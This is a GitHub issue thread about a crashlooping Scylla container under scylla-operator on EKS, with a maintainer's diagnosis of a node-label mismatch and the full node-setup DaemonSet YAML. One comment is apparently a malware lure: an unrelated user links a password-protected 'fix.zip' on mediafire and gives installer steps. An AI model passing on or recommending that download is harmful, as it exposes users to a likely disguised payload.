### ISSUE TITLE
Scylla container does not come up and ends up in crashloop state

### ISSUE THREAD

**Issue by cisse21** [scylladb/scylla-operator#2095]
### What happened?

The scylla container does not come up and ends up in a crashloopbackoff

### What did you expect to happen?

Scylla container to come up and be ready as soon as possible

### How can we reproduce it (as minimally and precisely as possible)?

deployed the operator and scylla cluster in an EKS setup using helm charts

### Scylla Operator version

https://github.com/scylladb/scylla-operator/releases/tag/v1.13.0

### Kubernetes platform name and version

<details>
Client Version: version.Info{Major:"1", Minor:"26", GitVersion:"v1.26.0", GitCommit:"b46a3f887ca979b1a5d14fd39cb1af43e7e5d12d", GitTreeState:"clean", BuildDate:"2022-12-08T19:51:43Z", GoVersion:"go1.19.4", Compiler:"gc", Platform:"darwin/arm64"}
Kustomize Version: v4.5.7
Server Version: version.Info{Major:"1", Minor:"29+", GitVersion:"v1.29.7-eks-2f46c53", GitCommit:"288383972a05cde5ed2c0daa913400d752313691", GitTreeState:"clean", BuildDate:"2024-07-25T04:23:15Z", GoVersion:"go1.22.5", Compiler:"gc", Platform:"linux/amd64"}

Kubernetes platform info:
Node - i4i.4xlarge
Volume - Node Volume
Deployed on EKS
</details>

### Please attach the must-gather archive.

[Archive.zip](https://github.com/user-attachments/files/16748613/Archive.zip)

### Anything else we need to know?
The pods start evaluation and takes forever to finish the evaluation, increasing the liveness and readiness probe of the statefulset to a pretty large number helps but this is not natively supported via ScyllaCluster CRD

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tnozicka** [comment]
```
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: cluster-node-setup
  namespace: scylla-operator-node-tuning
status:
  currentNumberScheduled: 0
  desiredNumberScheduled: 0
  numberMisscheduled: 0
```

```
apiVersion: scylla.scylladb.com/v1alpha1
kind: NodeConfig
metadata:
  name: cluster
spec:
  placement:
    nodeSelector:
      scylla.scylladb.com/node-type: scylla
```

I seems you lack the node labels to mach your NodeConfig selector

**Comment by cisse21** [comment]
I didn't get the part.. Can you elaborate a bit more on your comment?

Also attaching the full daemonset yaml

```
apiVersion: apps/v1
kind: DaemonSet
metadata:
  creationTimestamp: "2024-08-12T12:24:14Z"
  generation: 1
  labels:
    app.kubernetes.io/name: scylla-node-config
    scylla-operator.scylladb.com/node-config-name: cluster
  name: cluster-node-setup
  namespace: scylla-operator-node-tuning
  ownerReferences:
  - apiVersion: scylla.scylladb.com/v1alpha1
    blockOwnerDeletion: true
    controller: true
    kind: NodeConfig
    name: cluster
spec:
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      app.kubernetes.io/name: scylla-node-config
      scylla-operator.scylladb.com/node-config-name: cluster
  template:
    metadata:
      creationTimestamp: null
      labels:
        app.kubernetes.io/name: scylla-node-config
        scylla-operator.scylladb.com/node-config-name: cluster
    spec:
      affinity: {}
      containers:
      - args:
        - "\n# Create a temporary root that will represent the host file system and
          devices.\ncd \"$( mktemp -d )\"\n\n# Skip mounting entire /var, /run, /tmp
          to prevent from polluting host with files created in runtime in the container.\n#
          Required directories originating from these are mounted explicitly below.\nfor
          d in $( find /host -mindepth 1 -maxdepth 1 -type d -not -path /host/var
          -not -path /host/run -not -path /host/tmp -printf '%f\\n' ); do\n\tmkdir
          -p \"./${d}\"\n\tmount --rbind \"/host/${d}\" \"./${d}\"\ndone\n\nfor f
          in $( find /host -mindepth 1 -maxdepth 1 -type f -printf '%f\\n' ); do\n\ttouch
          \"./${f}\"\n\tmount --bind \"/host/${f}\" \"./${f}\"\ndone\n\nfind /host
          -mindepth 1 -maxdepth 1 -type l -exec cp -P \"{}\" ./ \\;\n\n# Required
          for node setup\nfor dir in \"run/udev\" \"run/mdadm\" \"run/dbus\"; do\n\tif
          [ -d \"/host/${dir}\" ]; then\n\t\tmkdir -p \"./${dir}\"\n\t\tmount --rbind
          \"/host/${dir}\" \"./${dir}\"\n\tfi\ndone\n\n# Required by CRI client\nfor
          dir in \"run/crio\" \"run/containerd\"; do\n\tif [ -d \"/host/${dir}\" ];
          then\n\t\tmkdir -p \"./${dir}\"\n\t\tmount --rbind \"/host/${dir}\" \"./${dir}\"\n\tfi\ndone\n\nif
          [ -f \"/host/run/dockershim.sock\" ]; then\n\ttouch \"./run/dockershim.sock\"\n\tmount
          --bind \"/host/run/dockershim.sock\" \"./run/dockershim.sock\"\nfi\n\n#
          Required by node tuning\nif [ -d \"/host/var/lib/kubelet\" ]; then\n\tmkdir
          -p \"./var/lib/kubelet\"\n\tmount --rbind \"/host/var/lib/kubelet\" \"./var/lib/kubelet\"\nfi\n\n#
          Mount operator binary\nmkdir -p ./scylla-operator\ntouch ./scylla-operator/scylla-operator\nmount
          --bind /usr/bin/scylla-operator ./scylla-operator/scylla-operator\n\n# Mount
          service account\nmkdir -p \"./run/secrets/kubernetes.io/serviceaccount\"\nfor
          f in ca.crt token; do\n\ttouch \"./run/secrets/kubernetes.io/serviceaccount/${f}\"\n\tmount
          --bind \"/run/secrets/kubernetes.io/serviceaccount/${f}\" \"./run/secrets/kubernetes.io/serviceaccount/${f}\"\ndone\n\n#
          Create special symlink\nif [ -L \"/host/var/run\" ]; then\n\tmkdir -p \"./var\"\n\tln
          -s \"../run\" \"./var/run\"\nfi\n\nexec chroot ./ /scylla-operator/scylla-operator
          node-setup-daemon \\\n--namespace=\"$(NAMESPACE)\" \\\n--pod-name=\"$(POD_NAME)\"
          \\\n--node-name=\"$(NODE_NAME)\" \\\n--node-config-name=\"cluster\" \\\n--node-config-uid=\"6a9a1b52-295c-4216-9ae4-6f7ba2b1dcbb\"
          \\\n--scylla-image=\"docker.io/scylladb/scylla:5.4.0\" \\\n--disable-optimizations=false
          \\\n--loglevel=4\n\t\t\t\t\t\t\t"
        command:
        - /usr/bin/bash
        - -euExo
        - pipefail
        - -O
        - inherit_errexit
        - -c
        env:
        - name: SYSTEMD_IGNORE_CHROOT
          value: "1"
        - name: POD_NAME
          valueFrom:
            fieldRef:
              apiVersion: v1
              fieldPath: metadata.name
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              apiVersion: v1
              fieldPath: spec.nodeName
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
        image: scylladb/scylla-operator:1.13.0
        imagePullPolicy: IfNotPresent
        name: scylla-node-config
        resources:
          requests:
            cpu: 10m
            memory: 50Mi
        securityContext:
          privileged: true
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
        volumeMounts:
        - mountPath: /host
          mountPropagation: Bidirectional
          name: hostfs
      dnsPolicy: ClusterFirst
      hostNetwork: true
      nodeSelector:
        scylla.scylladb.com/node-type: scylla
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      serviceAccount: scylla-node-config
      serviceAccountName: scylla-node-config
      terminationGracePeriodSeconds: 30
      volumes:
      - hostPath:
          path: /
          type: Directory
        name: hostfs
  updateStrategy:
    rollingUpdate:
      maxSurge: 0
      maxUnavailable: 1
    type: RollingUpdate
```
